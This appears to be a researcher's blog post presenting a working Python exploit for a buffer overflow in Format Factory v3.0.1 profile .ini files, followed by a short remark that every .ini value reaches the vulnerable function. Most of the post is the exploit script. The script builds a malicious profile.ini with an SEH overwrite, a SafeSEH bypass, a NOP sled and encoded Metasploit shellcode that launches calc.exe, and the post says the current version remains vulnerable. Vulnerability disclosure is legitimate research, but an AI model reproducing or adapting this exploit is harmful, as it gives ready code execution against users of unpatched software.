Here’s a working exploit for an already disclosed bug – including SafeSEH Bypass – and for the actual version, which is still vulnerable. Sadly.

#!/usr/bin/python

# Exploit Title: Format Factory v3.0.1 Profile File Handling Buffer Overflow
# Version:       <= 3.0.1
# Date:          2012-11-19
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      https://www.rcesecurity.com
# Software Link: http://www.pcfreetime.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         -
# Howto:         Copy .ini to %USERPROFILE%\My Documents\FormatFactory\PicCustom

from struct import pack

file="profile.ini"

junk1="\xCC" * 260
nseh="\xeb\x06\x90\x90"
eip=pack('<L',0x024C1923) # CALL DWORD PTR SS:[EBP-C] - SafeSEH Bypass
nops="\x90" * 10 
junk2="\xCC" * 10000

# windows/exec CMD=calc.exe 
# Encoder: x86/shikata_ga_nai
# powered by Metasploit 
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00'

shellcode = ("\xba\x68\x3e\x85\x1f\xd9\xca\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x33\x31\x50\x12\x83\xe8\xfc\x03\x38\x30\x67\xea\x44" +
"\xa4\xee\x15\xb4\x35\x91\x9c\x51\x04\x83\xfb\x12\x35\x13" +
"\x8f\x76\xb6\xd8\xdd\x62\x4d\xac\xc9\x85\xe6\x1b\x2c\xa8" +
"\xf7\xad\xf0\x66\x3b\xaf\x8c\x74\x68\x0f\xac\xb7\x7d\x4e" +
"\xe9\xa5\x8e\x02\xa2\xa2\x3d\xb3\xc7\xf6\xfd\xb2\x07\x7d" +
"\xbd\xcc\x22\x41\x4a\x67\x2c\x91\xe3\xfc\x66\x09\x8f\x5b" +
"\x57\x28\x5c\xb8\xab\x63\xe9\x0b\x5f\x72\x3b\x42\xa0\x45" +
"\x03\x09\x9f\x6a\x8e\x53\xe7\x4c\x71\x26\x13\xaf\x0c\x31" +
"\xe0\xd2\xca\xb4\xf5\x74\x98\x6f\xde\x85\x4d\xe9\x95\x89" +
"\x3a\x7d\xf1\x8d\xbd\x52\x89\xa9\x36\x55\x5e\x38\x0c\x72" +
"\x7a\x61\xd6\x1b\xdb\xcf\xb9\x24\x3b\xb7\x66\x81\x37\x55" +
"\x72\xb3\x15\x33\x85\x31\x20\x7a\x85\x49\x2b\x2c\xee\x78" +
"\xa0\xa3\x69\x85\x63\x80\x86\xcf\x2e\xa0\x0e\x96\xba\xf1" +
"\x52\x29\x11\x35\x6b\xaa\x90\xc5\x88\xb2\xd0\xc0\xd5\x74" +
"\x08\xb8\x46\x11\x2e\x6f\x66\x30\x4d\xee\xf4\xd8\xbc\x95" +
"\x7c\x7a\xc1")

poc="Type=" + junk1 + nseh + eip + nops + shellcode + junk2 

try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";

An important side – note! The bug has not been properly researched:

The Bugtraq – Posting states:

Vulnerable Module(s):
[+] INI - Width & Height - Size & Buffer Validation

But all other .ini values are vulnerable too. A closer look at the disassembly clearly shows that they are. The vulnerable function is called on every single value of the .ini file: